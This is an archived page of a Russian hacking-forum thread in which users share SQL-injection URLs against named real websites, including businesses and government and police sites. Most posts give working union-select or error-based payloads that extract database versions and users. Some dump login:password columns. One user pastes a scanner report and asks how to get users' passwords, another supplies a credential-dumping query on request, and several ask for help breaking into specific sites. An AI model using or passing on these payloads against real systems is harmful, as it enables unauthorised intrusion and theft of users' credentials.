Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

RE: Ваши Sql-инъекции

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> RE: Ваши Sql-инъекции
Имя
Сообщение << Старые топики   Новые топики >>
RE: Ваши Sql-инъекции - 2011-10-12 00:06:30.413333   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://www.cathedralhillpress.com/book.php?id=-1+Union+select+1,2,Version%28%29,4,5,6,7,8,9,10,11,12,13,14,15--
Post #: 641
RE: Ваши Sql-инъекции - 2011-10-14 21:39:26.350000   
GoAttack

Сообщений: 842
Оценки: 189
Присоединился: 2009-05-08 23:20:55.580000
http://bbyloosediamonds.com/pages.php?id=-1+union+select+1,@@version,3,4,5,6,7,8,9 1:byehuda:Y_dia2011
Post #: 642
RE: Ваши Sql-инъекции - 2011-10-20 13:56:24.300000   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.bcspeakers.com/product.php?id=-1+union+select+1,group_concat(id_user,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+_user
Post #: 643
RE: Ваши Sql-инъекции - 2011-10-25 23:40:16.506666   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://pojuca.ba.gov.br/conteudo/departamento_miolo.php?id=-21+union+select+1,version(),database(),4,5--
Post #: 644
RE: Ваши Sql-инъекции - 2011-10-26 01:10:56.843333   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://www.thatquailplace.com/articles/index.php?id=-7+union+select+1,2,version(),4,5,6,7,8,9,10,11--
Post #: 645
RE: Ваши Sql-инъекции - 2011-10-26 01:13:12.393333   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://www.thatquailplace.com/articles/index.php?id=-7+union+select+1,2,version(),4,5,6,7,8,9,10,11--
Post #: 646
RE: Ваши Sql-инъекции - 2011-11-05 23:49:45.233333   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://www.fondkadyrova.com/file.php?razd=1&id=-4+union+select+1,version(),3,4--
Post #: 647
RE: Ваши Sql-инъекции - 2011-11-07 21:53:27.523333   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://www.soleatlanta.com/pressmedia-detail.asp?REC_ID=-4+union+select+1,2,3,4,5,6,7--
http://pastebin.com/yhDV756Z
Post #: 648
RE: Ваши Sql-инъекции - 2011-11-08 00:43:33.126666   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://www.nypdangels.com/cop/cop.php?id=-374+order+by+9–

http://pastebin.com/tunsbxbt
Post #: 649
RE: Ваши Sql-инъекции - 2011-11-08 01:48:35.196666   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://darjeelingpolice.org/stolen_vehicle_view.php?ID=-130+union+select+1,2,3,4,version(),6,database(),8,user(),10,11,12,13,14,15,16,17,18,19,20,21-- http://www.dorset.polfed.org/news_article.php?id=-000427+union+select+1,2,database(),4,version(),6,7--
Post #: 650
RE: Ваши Sql-инъекции - 2011-11-21 18:17:20.770000   
Сaptain T0ma5o

Сообщений: 66
Оценки: 0
Присоединился: 2011-10-21 10:42:18.486666
http://www.aenbi.ru/index.php?pid=-42+union+select+1,2,version(),4–+
Post #: 651
RE: Ваши Sql-инъекции - 2011-12-14 17:36:20.300000   
slawyanin

Сообщений: 8
Оценки: 0
Присоединился: 2011-11-14 16:01:17.530000
ПОМОГИТЕ ПРАВИЛЬНО СФОРМИРОВАТЬ ЗАПРОС ЧТОБЫ УЗНАТЬ ПАССЫ ЮЗВЕРОВ ВОТ ИНФА О САЙТЕ

Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

Extracted Version: X-Powered-By: PHP/5.2.14

Vulnerable URL : http://www.ccылкунедам.com/forgot.php
Parameter Name: Email <==========
Parameter Type: Post <==========
Attack Pattern: '%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'

Vulnerable URL : http://www.ccылкунедам.com/forgot.php
Identified Internal Path(s): /home/tnburns/public_html/ccылкунедам.com/forgot.php
Parameter Name: Email <==================
Parameter Type: Post
Attack Pattern: '%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'

Vulnerable URL : http://www.ccылкунедам.com/forgot.php
Parameter Name: Email <=========
Parameter Type: Post
Attack Pattern: '%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'

Vulnerable URL : http://www.ccылкунедам.com/forgot.php
Parameter Name: Email <———-
Parameter Type: Post <———
Attack Pattern: ' OR 'ns'='ns <—

Vulnerable URL : http://www.ccылкунедам.com/members.php
Identified Field Name: password <—-

Vulnerable URL : http://www.ccылкунедам.com/members.php
Form target action: members.php <—–

Vulnerable URL : http://www.ccылкунедам.com/members.php
Identified Internal Path(s): /home/tnburns/public_html/ccылкунедам.com/members.php
Parameter Name: id <—–
Parameter Type: Post <—–
Attack Pattern: 1%27+or+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)–+1

Vulnerable URL : http://www.ccылкунедам.com/
Identified Cookie: PHPSESSID
Vulnerable URL : http://www.ccылкунедам.com/Scripts/'"–><script>netsparker(0x00003B)</script>
Parameter Name: URI-BASED <—–
Parameter Type: RawUrlInjection <======
Attack Pattern: '"–><script>netsparker(0x00003B)</script>


НА ПРИМЕРЕ ЭТОЙ ССЫЛКИ: http://www.site.com/forgot.php?Email=default
Post #: 652
RE: Ваши Sql-инъекции - 2011-12-17 14:35:25.296666   
headsucker

Сообщений: 1304
Оценки: 10
Присоединился: 2011-02-09 15:30:26.450000
del pls
Post #: 653
RE: Ваши Sql-инъекции - 2012-01-26 03:44:46.423333   
Mazay.off

Сообщений: 89
Оценки: 0
Присоединился: 2011-10-25 21:39:45.356666
http://ocenshik.mostpp.ru/news.php?id=1%20%26%26%201%3D2%20UNION%20SELECT%201%2C2%2C3%2C4%2CCONCAT%280x6467797436%2CCONCAT_WS%280x203A20%2CVERSION%28%29%2CDATABASE%28%29%2CUSER%28%29%29%2C0x3566646B68%29%2C6%2C7%2C8%20%23
VERSION: 4.0.27
DATABASE: ocenshik
USER: root@zvm27.host.ru
Post #: 654
RE: Ваши Sql-инъекции - 2012-01-27 18:33:45.603333   
AndreySasovo

Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000

quote:

ORIGINAL: Mazay.off

http://ocenshik.mostpp.ru/news.php?id=1%20%26%26%201%3D2%20UNION%20SELECT%201%2C2%2C3%2C4%2CCONCAT%280x6467797436%2CCONCAT_WS%280x203A20%2CVERSION%28%29%2CDATABASE%28%29%2CUSER%28%29%29%2C0x3566646B68%29%2C6%2C7%2C8%20%23
VERSION: 4.0.27
DATABASE: ocenshik
USER: root@zvm27.host.ru

баян .смотри сюда —–> http://forum.antichat.ru/showthread.php?p=1988791 пост 11572 и проверять здесь——>>> http://forum.antichat.ru/threadnav21336-1-10.html 1 пост
Post #: 655
RE: Ваши Sql-инъекции - 2012-01-27 18:48:54.293333   
Watcover3396

Сообщений: 22
Оценки: 0
Присоединился: 2011-08-10 17:55:55.606666
Помогите взломать сайт http://www.skyriver.ru/
Post #: 656
RE: Ваши Sql-инъекции - 2012-01-27 20:13:39.706666   
kravch_v

Сообщений: 1
Оценки: 0
Присоединился: 2012-01-27 20:10:06.030000

quote:

ORIGINAL: Watcover3396

Помогите взломать сайт http://www.skyriver.ru/

http://www.skyriver.ru/news.phtml?action=results&poll_ident=42'
инъекция слепая, раскручивай сам.
Post #: 657
RE: Ваши Sql-инъекции - 2012-02-03 17:39:03.603333   
Mazay.off

Сообщений: 89
Оценки: 0
Присоединился: 2011-10-25 21:39:45.356666
quote:

баян .смотри сюда —–&gt; http://forum.antichat.ru/showthread.php?p=1988791 пост 11572 и проверять здесь——&gt;&gt;&gt; http://forum.antichat.ru/threadnav21336-1-10.html 1 пост

8| сорри… не виноват что мне попался именно этот сайт… прошу прощения
Post #: 658
RE: Ваши Sql-инъекции - 2012-02-05 20:21:22.463333   
Mouwa

Сообщений: 10
Оценки: 0
Присоединился: 2012-02-04 22:56:43.680000
Что нужно, когда получил что-то вроде
zagred@localhost
9

zagred@localhost

zagran

lenny1
????
Post #: 659
RE: Ваши Sql-инъекции - 2012-02-05 20:27:40.626666   
Mouwa

Сообщений: 10
Оценки: 0
Присоединился: 2012-02-04 22:56:43.680000
Что делать после того, как получил информацию user(),database(),version() ??
Post #: 660
RE: Ваши Sql-инъекции - 2012-02-06 00:54:03.096666   
Сaptain T0ma5o

Сообщений: 66
Оценки: 0
Присоединился: 2011-10-21 10:42:18.486666
Mouwa, вопрос по моему другой, что тебе от сайта надо) Вот сможешь на него корректно ответить и предыдущий вопрос отпадет
Post #: 661
RE: Ваши Sql-инъекции - 2012-02-08 00:25:38.400000   
Mouwa

Сообщений: 10
Оценки: 0
Присоединился: 2012-02-04 22:56:43.680000
Помогите найти уязвимость на webmasters.ru?
Post #: 662
RE: Ваши Sql-инъекции - 2012-02-08 20:58:53.143333   
fiesta14

Сообщений: 35
Оценки: 0
Присоединился: 2011-11-16 21:03:10.433333
Mouwa Думаю там нет уязвимостей !
Post #: 663
RE: Ваши Sql-инъекции - 2012-02-13 06:37:57.250000   
vivirna

Сообщений: 5
Оценки: 0
Присоединился: 2011-11-27 11:29:33.116666
Люди киньте сайты с какими-нибудь интересными случаями, желательно с комментариями! Заранее благодарю!
Post #: 664
RE: Ваши Sql-инъекции - 2012-02-17 16:43:14.813333   
thom crowz

Сообщений: 37
Оценки: 0
Присоединился: 2011-03-01 14:49:21.793333
https://www.overstock.com/intlcheckout



idea?
Post #: 665
RE: Ваши Sql-инъекции - 2012-02-29 18:58:57.543333   
Heitz

Сообщений: 84
Оценки: 0
Присоединился: 2012-02-27 23:54:14.600000
Target: http://sanitek.com.ua/?id=99999999
Host IP: 77.87.192.86
Web Server: nginx/0.6.32
Powered-by: PHP/5.2.6-1+lenny13
DB Server: MySQL >=5
Current User: u_sanitek@localhost
Sql Version: 5.0.51a-24+lenny5
Current DB: sanitek
System User: u_sanitek@localhost
Data Bases: information_schema
sanitek
Post #: 666
RE: Ваши Sql-инъекции - 2012-03-22 23:56:17.133333   
Almasik

Сообщений: 46
Оценки: 0
Присоединился: 2011-09-05 05:42:33.513333
http://www.bcspeakers.net/product.php?id=1'
Post #: 667
RE: Ваши Sql-инъекции - 2012-03-23 00:01:25.740000   
Almasik

Сообщений: 46
Оценки: 0
Присоединился: 2011-09-05 05:42:33.513333
http://mybread.mobi/glossary.php?Id=-1+union+select+1,concat_ws%280x3a,version%28%29,dat%20abase%28%29,user%28%29%29,3–+
Post #: 668
RE: Ваши Sql-инъекции - 2012-03-23 00:02:49.650000   
Almasik

Сообщений: 46
Оценки: 0
Присоединился: 2011-09-05 05:42:33.513333
http://www.glaucomajournal.ru/
раньше можно было тупо вставлять ковычку,щас пофиксили,нужен обход фильтрфцу431
Post #: 669
RE: Ваши Sql-инъекции - 2012-04-14 15:15:27.416666   
UDMYRT

Сообщений: 1
Оценки: 0
Присоединился: 2012-04-14 09:27:40.943333
http://sexxxinfo.ru/index.php?id=50113
Post #: 670
RE: Ваши Sql-инъекции - 2012-04-19 16:52:34.146666   
MicroXaker

Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
http://www.vorstu.ru/search/?sel_rubric[]=(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(78),CHAR(80),CHAR(51),CHAR(121),CHAR(109),CHAR(97),CHAR(105),CHAR(67)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&text=1
Кто-нить, помогите её раскрутить до таблиц логин:пароль.
Post #: 671
RE: Ваши Sql-инъекции - 2012-04-20 12:38:02.740000   
r1dex

Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
http://www.vorstu.ru/search/?sel_rubric[]=(select+1+and+row(1,1)%3E(select+count(*),concat(concat((select+concat(user_login,0x3a,user_password)+from+user+limit+0,1)),floor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&text=1
Post #: 672
RE: Ваши Sql-инъекции - 2012-04-20 16:35:33.126666   
MicroXaker

Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
Большое спасибо!
Post #: 673
RE: Ваши Sql-инъекции - 2012-05-01 11:23:17.140000   
Celldweller

Сообщений: 19
Оценки: 0
Присоединился: 2011-04-30 12:22:10.366666
Ребята, кто-нибудь знает, можно ли эту http://leaderproduction.ru/?p=3394 уязвимость дальше раскрутить .. Буду признателен!
Post #: 674
RE: Ваши Sql-инъекции - 2012-05-01 11:51:11.940000   
GothX

Сообщений: 263
Оценки: 20
Присоединился: 2011-06-22 13:27:08.173333
Нельзя)
Post #: 675
Страниц:  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [17]
Все форумы >> [Уязвимости] >> RE: Ваши Sql-инъекции







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.